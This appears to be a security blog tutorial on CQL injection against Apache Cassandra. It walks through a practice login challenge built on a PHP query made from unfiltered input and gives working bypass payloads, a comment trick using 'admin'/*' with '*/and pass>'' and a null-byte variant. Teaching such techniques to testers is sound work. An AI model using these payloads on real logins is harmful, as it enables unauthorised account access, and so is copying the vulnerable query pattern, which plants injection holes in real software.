Apache Cassandra is a free and open-source distributed NoSQL (Not only SQL) database designed to handle large amounts of data. It’s one of the most popular databases nowadays (15th) according to this StackOverflow survey and the second most popular NoSQL database according to here and here.
Cassandra is one of the NoSQL databases with one of the languages more closely to the traditional SQL: it’s called Cassandra Query Language or CQL.
It’s a kind of SQL but very simplified, it does not have joins or unions. No stacked queries or even “or”! So how it can be useful for a tester or attacker?
Let’s start with our classic 101, login bypass, by checking the challenge in our Database Injections Forum.
To be able to build a classic query like the one we use in MySQL for example, we need a little tweaking like we see in that screenshot of the CQL client.
The “ALLOW FILTERING” statement is needed to execute the query so it’s added to PHP code resulting in the following.
SELECT * FROM users WHERE user = '$INPUT1' AND pass = '$INPUT2' ALLOW FILTERING;
In login page there’s no filtering at all. But even knowing that we can’t simply comment the rest of the query, why it’s so hard to bypass the login screen?
Because in Cassandra those known SQLi tricks like ‘ or ”=’ and etc will fail miserably: there’s simply no “or” in Cassandra Query Language!
Well, we can still use AND!
username: admin'/* password: */and pass>'
Try it here.
By selecting admin as user, breaking out of it and commenting with /*, we start to enclose the hanging quote and “pass” column requirement. Then we use the password field to close the comment and resume the query.
We use the AND operator and by guessing the “pass” column/key name, we can use the greater than operator to make it return any string that comes alphabetically after the ” one, an empty one. Pretty much any password, of course.
That’s how our resulting query looks like. In red, our commented section.
SELECT * FROM users WHERE user = 'admin'/*' AND pass = '*/and pass>'' ALLOW FILTERING;
It’s also possible to bypass login with (null byte):
username: admin' ALLOW FILTERING; %00 password: ANY
If there’s no keyword filtering, character limiting or WAF. Not that cool as the other one though! Hey @haxel0rd! 😉
— Rodolfo Assis (@rodoassis) September 6, 2018
Stay tuned for part 2 where we will discuss where and when we can take advantage of injections in Cassandra database. See you!
P.S.: source code is on directory index.